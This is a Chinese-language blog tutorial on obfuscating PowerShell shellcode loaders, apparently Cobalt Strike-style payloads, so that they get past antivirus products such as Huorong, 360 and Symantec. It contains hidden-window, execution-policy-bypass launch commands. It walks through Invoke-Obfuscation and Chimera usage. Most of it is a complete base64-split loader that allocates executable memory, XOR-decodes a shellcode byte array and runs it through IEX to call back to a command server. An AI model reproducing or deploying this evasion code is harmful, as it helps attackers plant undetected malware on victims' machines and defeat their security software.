前言

powershell PS1格式的需要执行

cmd.exe /c “echo Write-Host SUCCESS -Fore Green | Powershell -nop -w hidden -ExecutionPolicy Bypass -File .\payload2.ps1”

Powershell -nop -w hidden -ExecutionPolicy Bypass -File .\payload.ps1
image.png

powershell command

格式的直接cmd运行即可(无文件)
利用powershell直接将shellcode加载进内存执行
image.png

上面的base64解密后的内容如下
其中使用了IO.Compression.GzipStream来进行压缩和解压缩
然后再用frombase64string再转化为字节流,调用进行上线
image.png
将此处的字节流通过如下Powershell脚本即可还原为原本的powershell脚本
image.png

  1. $data = [System.Convert]::FromBase64String("base64字节流")
  2. $ms = New-Object System.IO.MemoryStream
  3. $ms.Write($data, 0, $data.Length)
  4. $ms.Seek(0,0) | Out-Null
  5. $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
  6. $sr.ReadToEnd()

还原后的powershell脚本如下,可以看到,和Powershell command 格式和powershell格式的shellcode结构上几乎是一模一样的,但是不知道为啥下面少了一段代码
image.png
最下面的frombase64string的字符串就是shellcode byte[] 字节流

开始绕过

那我们直接用powershell格式的来进行绕过杀软吧,使用如下Powershell代码将base64压缩后字符串进行解密

  1. $string = ""
  2. $s=[System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNx
  3. cnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJimyjmIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFim=')
  4. $s |foreach {$string=$string+$_.Tostring()+','}
  5. $string

最后会转化为如下格式的字节流,这个格式的我们就比较熟悉了
image.png

1、我们这里选择直接干掉base64String后的shellcode

直接将
[Byte[]]$var_code = [System.Convert]::FromBase64String(
替换为
[Byte[]]$var_code = Byte[]
image.png
即可实现绕过火绒和360
image.png
但是依然会被大量查杀
image.png

之后将powershell的变量名全部替换成自己喜欢的例如var_code变成asd_ccooddee,少了一个查杀
image.png

OK我们现在开始来分解代码段
以If ([IntPtr]::size -eq 8) 为分割点来上传到VT上去
此部分代码无问题
image.png
image.png

但是上半部分的代码有问题了,get_address和get_type的代码绕不过去

2、使用Invoke-Obfuscation对get_address和get_type进行绕过

https://github.com/danielbohannon/Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation
image.png
成功出现此界面后,我们将上面我们初步免杀过后的PS1文件截取一部分出来,例如image.png
另存为另外一个文件a.ps1
set scriptpath E:\cs\ps\a.ps1
encoding
1
之后就会生成对刚刚a.ps1的混淆代码,此时我们在将a.ps1与剩下的还没混淆过的代码进行拼接,运行,可成功上线
image.png
查杀率少了三个,看来还是有点作用的
image.png
并且我们发现,以下这段代码必会触发红色告警
image.png
我们使用+1 -1 大法
image.png

换种powershell

最后还是没绕过去,然后换了个powershell版本,上述的powershell我们是是生成x64位的代码,果然是生成问题了,但是其实不使用x64的代码我们也可以使用x32的,因为Windows依旧是有向下兼容的。

1、去掉第一行,并且修改中间部分字符串的payload,具体操作可以见开始绕过的步骤
image.png
2、转base64
image.png
3、使用混淆添加字符串以及尾部添加字符串,然后替换为空,注意这里的混淆字符串要添加足够多,不然依旧会被微软的VT识别
image.png
4、这里混淆后被赛门铁壳识别了,我们将字符串划分然后再加起来
image.png

最后的结果
image.png

  1. $aaaaaaaaaaa = @'
  2. 1234567890Z1234567890nVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106Ol1234567890J1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpL1234567890kRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV12345678909idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wY1234567890XJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gIFtCeXRlW11dKDIyMywyMDMsMTcwLDM1LDM1LDM1LDY3LDE3MCwxOTgsMTgsMjQxLDcxLDE2OCwxMTMsMTksMTY4LDExMyw0NywxNjgsMTEzLDU1LDE2OCw4MSwxMSw0NCwxNDgsMTA1LDUsMTgsMjIwLDE4LDIyNywxNDMsMzEsNjYsOTUsMzMsMTUsMywyMjYsMjM2LDQ2LDM0LDIyOCwxOTMsMjExLDExMywxMTYsMTY4LDExMyw1MSwxNjgsOTcsMzEsMzQsMjQzLDE2OCw5OSw5MSwxNjYsMjI3LDg3LDEwNSwzNCwyNDMsMTE1LDE2OCwxMDcsNTksMTY4LDEyMywzLDM0LDI0MCwxOTIsMzEsMTA2LDE2OCwyMywxNjgsMzQsMjQ1LDE4LDIyMCwxOCwyMjcsMTQzLDIyNiwyMzYsNDYsM1234567890zQsMjI4LDI3LDE5NSw4NiwyMTUsMzIsOTQsMjE5LDI0LDk0LDcsODYsMTkzLDEyMywxNjgsMTIzLDcsMzQsMjQwLDY5LDE2OCw0NywxMD1234567890QsMTY4LDEyMyw2MywzNCwyNDAsMTY4LDM5LDE2OCwzNCwyNDMsMTcwLDEwMyw3LDcsMTIwLDEyMCw2NiwxMjIsMTIxLDExNCwyMjAsMTk1LDEyMywxMjQsMTIxLDE2OCw0OSwyMDAsMTY1LDEyNiw3NSw3Nyw3MCw4NywzNSw3NSw4NCw3NCw3Nyw31234567890NCwxMTksNzUsMTExLDg0LDUsMzYsMjIwLDI0NiwyMDMsMzUsMzUsMzUsMzUsMTgsMjIwLDExNiwxMTYsMTE2LDExNiwxMTYsNzUsMjUsMTE3LDkwLDEzMiwyMjAsMjQ2LDIwM1234567890iwxMzUsMzUsMzUsMzUsMTIwLDE4LDIzNCwxMTQsMTE0LDczLDMyLDExNCwxMTQsNzUsNDAsMjMwLDM1LDM1LDExMiwxMTUsNzUsMTE2LDE3MCwxODgsMjI5LDIyMCwyNDYsMTE1LDIwMiwxNzUsMzUsMzUsMzUsMTIwLDE4LDI0MSwxMTMsNzUsMzUsMTcsMjI3LDE2NywxMTMsMTEzLDExMywxMTIsMTEzLDExNSw3NSwyMDAsMTE4LDEzLDI0LDIyMCwyND1234567890YsMTcwLDIyOSwxNjAsMjI0LDExNSw3NSwxNjMsMTYsMzUsMzUsMTcwLDE5NSw3My1234567890wzOSwxMTUsNzMsNjAsMTE3LDc1LDg2LDEwMSwxODksMTY1LDIyMCwyNDYsMTI0LDE4LDIyMCwxMTYsMTE2LDczLDIyMCwxMTIsMTE3LDc1LDE0LDM3LDU5LDg4LDIyMCwyNDYsMTY2LDIyNyw0NCwxNjcsMjMzLDM0LDM1LDM1LDE4LDIyMCwxNjYsMjEzLDg3LDM5LDE3MCwyMTgsMjAwLDQyLDc1LDEzNywyMzAsMTkzLDEyNiwyMjAsMjQ2LDE3MCwyMjYsNzUsMTAyLDIsMTI1LDE4LDIyMCwyNDYsMTgsMjIwLDExNiw3MywzNiwxMTQsMTE3LDExNSw3NSwxNDgsMTE2LDE5NSw0MCwyMjAsMjQ2LDE1NiwzNSwxMiwzNSwzNSwyNiwyMjgsODYsMzYsMTIzLDExNSwyMDIsODgsMjIwLDIyMCwyMjAsMTgsMjIwLDIwMiwxNzgsMzQsMzUsMzUsMjAyLDIzNCwzNCwzNSwzNSwyMDMsNzYsMjIwLDIyMCwyMjAsMTIsNjQsMTIzLDE3LDc2LDM1LDIyLDEwOCwyLDExNSw2LDk5LDk4LDExNSwxMjAsMjMsMTI3LDExNSwxMjEsMTIzLDIyLDIzLDExLDExNSwxMjUsMTAsMjAsOTYsOTYsMTAsMjAsOTQsNywxMDIsMTA2LDk2LDk4LDExMywxNCwxMTIsMTE5LDk4LDEwOSwxMDMsOTgsMTEzLDEwMywxNCw5OCwxMDksMTE5LDEwNiwx1234567890MTcsMTA2LDExMywxMTgsMTEyLDE0LDExOSwxMDIsMTEyLDExOSwxNCwxMDEsMT1234567890A2LDExMSwxMDIsMiw3LDEwNyw4LDEwNyw5LDM1LDIyLDEwOCwyLDExNSw2LDM1LDExOCw4MCw3MCw4MSwxNCw5OCw2OCw3MCw3Nyw4NywyNSwzLDExMCw3Niw4OSw3NCw3OSw3OSw2NiwxMiwyMiwxMywxOSwzLDExLDY0LDc2LDc4LDgzLDY2LDg3LDc0LDY1LDc5LDcwLDI0LDMsMTEwLDExMiwxMDYsMTAyLDMsMjYsMTMsMTksMjQsMywxMTYsNzQsNzcsNzEsNzYsODQsODAsMywxMDksMTE5LDMsMjEsMTMsMTgsMjQsMywxMTksODEs1234567890NzQsNzEsNzAsNzcsODcsMTIsMjIsMTMsMTksMjQsMyw5NywxMDgsMTA2LDEwMiwyNiwyNCwxMDksMTExLDEwOSwxMTEsMTAsNDYsNDEsMzUsMjIsMTA4LDIsMTE1LDYsOTksOTgsMTE1LDEyMCwyMywxMjcsMTE1LDEyMSwxMjMsMjIsMjMsMTEsMTE1LDEyNSwxMCwyMCw5Niw5NiwxMCwyMCw5NCw3LDEwMiwxMDYsOTYsOTgsMTEzLDE0LDExMiwxMTksOTgsMTA5LDEwMyw5OCwxMTMsMTAzLDE0LDk4LDEwOSwxMTksMTA2LDExNywxMDYsMTEzLDExOCwxMTIsMTQsMT1234567890E5LDEwMiwxMTIsMTE5LDE0
  3. aaaaaaaaaa
  4. '@
  6. $aaaaaaaaaaa2 =@'
  7. LDEwMSwxMDYsMTExLDEwMiwyLDcsMTA3LDgsMTA3LDksMzUsMjIsMTA4LDIsMTE1LDY1234567890sOTksOTgsMTE1LDEyMCwyMywxMjcsMTE1LDEyMSwxMjMsMjIsMjMsMTEsMTE1LDEyNSwxMCwyMCw5Niw5NiwxMCwyMCw5NCw3LDEwMiwxMDYsOTYs1234567890OTgsMTEzLDE0LDExMiwxMTksOTgsMTA5LDEwMyw5OCwxMTMsMTAzLDE0LDk4LDEwOSwxMTksMTA2LDExNywxMDYsMTEzLDExOCwxMTIsMTQsMTE5LDEwMiwxMTIsMTE5LDE0LDEwMSwxMDYsMTExLDEwMiwyLDcsMTA3LDgsMTA3LDksMzUsMjIsMTA4LDIsMTE1LDYsOTksOTgsMTE1LDEyMCwyMywxMjcsMTE1LDEyMSwxMjMsMjIsMjMsMTEsMTE1LDEyNSwxMCwyMCw5Niw5NiwxMCwyMCw5NCw3LDEwMiwxMDYsOTYsOTgsMTEzLDE0LDExMiwxMTksOTgsMTA5LDEwMyw5OCwxMTMsMTAzLDE0LDk4LDEwOSwxMTksMTA2LDExNywxMDYsMTEzLDExOCwxMTIsMTQsMTE5LDEw1234567890Miwx1234567890M1234567890T1234567890I1234567890s1234567890M1234567890T1234567890E123456789051234567890L1234567890D1234567890E0LDEwMSwxMDYsMTExLDEwMiwyLDcsMTA3LDgsMTA3LDksMzUsMjIsMTA4LDIsMTE1LDYsOTksOTgsMTE1LDEyMCwzNSw3NSwyMTEsMTUwLDEyOSwxMTcsMjIwLDI0Niw3Myw5OSw3NSwzNSw1MSwzNSwzNSw3NSwzNSwzNSw5OSwzNSwxMTYsNzUsMTIzLDEzNSwxMTIsMTk4LDIyMCwyNDYsMTc2LDE1NCwzNSwzNSwzNSwzNSwzNCwyNTAsMTE0LDExMiwxNzAsMTk2LDExNiw3NSwzNSwzLDM1LDM1LDExMiwxMTcsNzUsNDksMTgxLDE3MCwxOTMsMjIwLDI0Niw1234567890xNjYsMjI3LDg3LDIyOSwxNjgsMzYsMzQsMjI0LDE2NiwyMjcsODYsMTk4LDEyMywyMjQsMjAzLDE3MCwyMjIsMjIwLDIyMCwyNywxOCwxMywyMSwyNywxMywxNywxNiwxNywxMy1234567890wyMywyMCwzNSwzNSwz1234567890NSwzNSwzNSkKCgpmb3IgKCR4ID0gMDsgJHggLWx0ICR2YXJfY29kZS5Db3VudDsgJHgrKykgewoJJHZhcl9jb2RlWyR4XSA9ICR2YXJfY29kZVskeF0gLWJ4b3IgMzUKfQoKJHZhcl92YSA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKChmdW5jX2dldF9wcm9jX2FkZHJlc3Mga2VybmVsMzIuZGxsIFZpcnR1YWxBbGxvYyksIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0sIFtVSW50MzJdLCBbVUludDMyXSwgW1VJbnQzMl0pIChbSW50UHRyXSkpKQokdmFyX2J1ZmZlciA9ICR2YXJfdmEuSW52b2tlKFtJbnRQdHJdOjpaZXJvLCAkdmFyX2NvZGUuTGVuZ3RoLCAweDMwMDAsIDB4NDApCltTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJHZhcl9jb2RlLCAwLCAk1234567890dmFyX2J1ZmZlciwgJHZhcl9jb2RlLmxlbmd0aCkKCiR2YXJfcnVubWUgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigkdmFyX2J1ZmZlciwgKGZ1bmNfZ2V0X2RlbGVnYXRlX3R5cGUgQChbSW50UHRyXSkgKFtWb2lkXSkpKQokdmFyX3J1bm1lLkludm9rZShbSW50UHRyXTo6WmVybyk=aaaaaaaaaa
  8. '@
  10. $aaaaaaaaaaa=$aaaaaaaaaaa.SubString(0,$aaaaaaaaaaa.Length-10)
  11. $aaaaaaaaaaa=$aaaaaaaaaaa.Replace('1234567890','')
  12. $aaaaaaaaaaa2=$aaaaaaaaaaa2.SubString(0,$aaaaaaaaaaa2.Length-10)
  13. $aaaaaaaaaaa2=$aaaaaaaaaaa2.Replace('1234567890','')
  14. $aa=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aaaaaaaaaaa+$aaaaaaaaaaa2))
  16. $asdasd="1"
  18. If ([IntPtr]::size -eq 8) {
  19.     start-job { param($a) IEX $a } -RunAs32 -Argument $aa | wait-job | Receive-Job
  20. }
  21. else {
  22.     IEX $aa
  23. }

最后推荐一个工具Chimera,相对于其他的这个工具可能知道的人少一点。

过了一段时间后,我发现之前写的powershell有部分不免杀了,现在用以前修改过的powershell,在进行二次混淆。

  1. ./chimera.sh -f 1.ps1  -l 1 -v -o 2.ps1

1629361718.png

  1. ./chimera.sh -f 1.ps1  -l 1 -a -o 3.ps1

image.png

  1. -a, --all           same as: -l 0 -v -t -c -i -p -h -s -b -j -k -e  全部使用
  3. -l,——level字符串操作的级别(0=随机,1=低 还有2,3,4,5)
  4. -v,——variables用任意字符串替换变量,
  6. 使用-v 来使用
  7.   自定义单词列表作为变量名替换
  8.   -t,——typedata用任意字符串替换数据类型(例如,
  9.   System.IO.StreamWriter)。使用-t to
  12. -c,——comments将注释替换为任意字符串
  13. 使用-c 来使用自定义
  14. 文本而不是随机字符串
  15. 在每一行中插入任意注释
  17. -h,——hexIP地址转换为十六进制值
  18. -s,——string模糊提供的字符串,使用-s
  19. 在提供的字符串中插入反引号,例如,ne ' w ' -OB ' je ' ct
  20. -j,——functions用任意字符串替换函数名
  21. -d,——decimal将模糊有效负载转换为十进制格式
  23. 改善AMSI逃避;增加AV检测
  24.   -g,——nishang移除nishang特有的特征
  25.   -k,——keywords搜索可能触发的单词的模糊输出
  26.   默认情况下搜索常用单词(backdoor,有效载荷,nishang),使用-k 包含更多
  27.   -r,——random随机字符标点符号
  28.   -p,——prepend将随机数的空格添加到行
  30. misc:
  31.   -e,——检查输出文件内容的预览片段
  32.   -q,——quiet禁止不必要的信息
  33.   -z -no-art如果你讨厌很棒的ASCII艺术

可以看到免杀效果是非常不错的,经过测试,-a的3.ps1使用不了,-v的2.ps可以成功上线,大家可以自己diy吧。
image.png

其他工具:

https://github.com/tihanyin/PSSW100AVB

一些文章

https://www.cnblogs.com/forforever/p/13882312.html
https://www.t00ls.net/articles-55754.html
https://my.oschina.net/u/4196756/blog/4689257